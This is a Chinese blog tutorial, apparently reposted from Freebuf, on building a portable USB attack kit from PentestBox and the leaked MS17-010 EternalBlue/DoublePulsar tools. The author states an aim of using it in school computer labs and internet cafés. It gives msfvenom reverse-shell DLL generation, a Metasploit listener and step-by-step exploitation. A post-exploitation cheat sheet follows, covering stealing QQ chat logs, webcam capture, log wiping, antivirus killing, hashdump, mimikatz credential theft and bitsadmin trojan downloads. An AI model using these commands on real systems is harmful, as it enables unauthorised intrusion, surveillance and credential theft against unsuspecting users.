利用pentestbox打造ms17-010移動"殺器"

本文首發Freebuf，屬原創獎勵計劃，未經許可禁止轉載。

連接：http://www.freebuf.com/articles/system/132274.html

一. 前言

　　前段時間Shadow Broker披露了 Windows大量漏洞，甚至爆出黑客組織 Equation Group 對於Windows 遠程漏洞 MS17-010 的利用工具，該漏洞影響範圍之廣，堪稱殺器。能夠看看官方通告https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

　　因而想着把攻擊環境移植到u盤裏，而後好比去學校機房，網吧。。。。。。

　　這裏分享一下我的的移植過程，以及在使用攻擊代碼過程當中遇到的問題。

 

二. 環境移植過程

思路就是利用現成的神器pentestbox，向裏添加攻擊代碼以及其運行須要的pytho環境

Pentest Box是一款Windows平臺下預配置的便攜式開源滲透測試環境，集成了各類編譯運行環境，具體的能夠到網上了解一下。

 

1.  工具準備：

Pentestbox:

https://pentestbox.org/zh/

 

方程式工具包: 

EQGRP_Lost_in_Translation

https://github.com/x0rz/EQGRP_Lost_in_Translation/tree/master

 

python環境

必須在Python2.6  和 pywin32-221環境下，若是你用其餘環境，會報各類諸如模塊/dll缺失等錯誤

 

Python2.6  和 pywin32-221位數須要相同，我用的是32位的

Python2.6.6 （32） 

下載連接：https://www.python.org/download/releases/2.6.6/

pywin32-221（32）

下載連接：

https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/pywin32-221.win32-py2.6.exe/download

 

 

2.  Pentestbox下python2.6環境配置

分別安裝，而後你會獲得攻擊包運行的python2.6環境

 

在Python26\Lib\site-packages目錄下，你會發現插件也已經安裝

 

而後把python26這個文件夾拷貝到你的pentestbox環境變量目錄下：Pentestbox\base

剛纔你也能夠直接裝到pentestbox\base下

 

而後咱們添加python2.6環境變量,在Pentestbox \config\alias文件中加一行

python26="%pentestbox_ROOT%\base\Python26\python.exe" $*

 

而後咱們啓動pentestbox，因爲pentestbox經過線程注入掛鉤cmd.exe來調用系統命令，所以殺軟可能會提示警告，信任便可。

 

這個時候，咱們運行python26能夠看到環境配置成功

 

 

3. 漏洞利用工具配置

咱們下載EQGRP_Lost_in_Translation工具包,修改windows目錄下fb.py，去除沒必要要的代碼

 

 

而後咱們把windows文件夾複製到pentestbox目錄下

 

這裏我把windows裏的文件放到pentestbox根目錄下的ms17-010文件夾內

 

 

咱們進入ms07-010目錄並執行python26 fb.py

這樣咱們就能夠啓動攻擊程序了

 

三. 攻擊示例

攻擊機：192.168.1.106

靶機： 192.168.1.111   windows x64 SP1

 

咱們先用msf生成dll木馬，用於控制目標

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxxx  LPORT=9999 -f dll > 9999-64.dll

 

Pentestbox裏自帶的metasploit框架我在使用老是時出現問題，我通常不用它，我一般是在本身的vps服務器進行監聽

本地測試時候能夠找一臺kali攻擊機

dll木馬咱們能夠提早生成好放在u盤裏帶着，隨時備用*_*

 

接下來咱們用Msf進行監聽

　　use exploit/multi/handler

　　set payload windows/x64/meterpreter/reverse_tcp

　　set LHOST IP     (這裏填寫vps的內網ip，記得開放監聽端口)

　　set LPORT 9999

　　set stagerverifysslcert false

　　exploit -j

 

若是沒有設置set stagerverifysslcert false，獲取shell的時候可能會出現這樣的狀況

 

回到fb.py中，開始攻擊

[?] Default Target IP Address [] :              攻擊目標

[?] Default Callback IP Address [] :            本機ip

[?] Use Redirection [yes] : no                    是否重定向

[?] Base Log directory [D:\logs] :            是否輸出日誌

而後建立一個項目實例

若是你以前建立過實例，能夠選擇它，改設置，也能夠從新建立一個

 

 

 輸入命令 use 能夠查看咱們利用的exp模塊

咱們使用EternalBlue模塊，use EternalBlue

 

下面一直回車就行。。。

 

選擇攻擊目標的系統

 

這裏會詢問你payload傳輸方式  選擇1，感受更穩定些

 

繼續回車，確認信息

 

 

成功以後，咱們使用doublepulsar模塊

繼續一路回車

 選擇協議

 選擇目標系統

 

選擇攻擊方式，咱們利用dll木馬

 

設置dll木馬路徑，我已經提早生成好放在u盤裏隨身攜帶，隨時備用~

 

而後設置要注入的程序，默認是lsass.exe

 

 

這裏注入的進程會對目標形成影響，也試了幾個其餘程序，好比注explorer時候，會彈出一個報錯框

注入其餘進程，有時候或多或少都會出那麼點問題

 

而後是一路回車

 

 

最後一步執行攻擊

 

Msf這裏成功獲取shell

 

截個屏看看

 

一個正在成長中的團隊，歡迎交流，分享，合做~

 

四. 後滲透輔助命令

配合下面的一些命令，happy to play~

meterpreter

upload /root/nc.exe c:\\windows\\system32　　#上傳文件

search –d c:\\windows –f *.mdb        　　 　　#在目標主機Windows目錄中搜索文件s

 

執行程序

execute -H -i -f cmd.exe #隱藏執行cmd並與之交互

execute -H -m -d calc.exe -f wce.exe -a 「-o foo.txt」                   #隱藏執行，並顯示虛假運行程序

 

咱們能夠用遠控生成一個木馬傳過去

 

 

例：下載目標聊天記錄到本地/tmp目錄下，可用Qqlogger查看

download c:\\Programs Files\\Tecent\\QQ\\Users\\qq號\\Msg2.0.db /tmp

 

run webcam -p 圖片保存路徑        　　#開啓目標攝像頭並截圖

run packetrecorder –i 會話序號 　　#捕獲流量數據包.pcap

 

提權

use privs

getsystem

getuid

 

clearev --清除日誌  

run killav --幹掉殺軟        

 

文件關聯

改變文件類型關聯DLL到 txt文件類型： assoc .dll=txtfile

改變文件類型關聯EXE 到png文件類型： assoc .exe=pngfile

改變文件類型關聯MP3到jpg文件類型： assoc .mp3=jpgfile

 

Hash獲取

hashdump或run hashdump或run smart_hashdump

>run post/windows/gather/hashdump

>run /windows/gather/smart_hashdump        --可繞過windows UAC控制

 

用kiwi獲取明文密碼：

meterpreter>load kiwi

meterpreter> creds_all

 

Metaspolit中使用Mimikatz:

使用metasploit內建的命令：

meterpreter > load mimikatz

meterpreter > msv   #msv creden

meterpreter > kerberostials #kerberos credentials

 

使用mimikatz自帶的命令：

meterpreter > mimikatz_command -f samdump::hashes

meterpreter > mimikatz_command -f sekurlsa::searchPasswords

<前面一句命令在密碼超過14位時LM會爲空，後一句命令能夠獲得明文>

 

利用windows命令下載文件

bitsadmin /transfer mydownJob /download /priority normal 「http://url/muma.exe"   "F:\muma.exe "

詳細用法可參考：https://technet.microsoft.com/zh-cn/library/cc753856(v=ws.10).aspx

 

最後：

今天下午有人在i春秋發佈了批量利用程序

https://bbs.ichunqiu.com/thread-21863-1-1.html~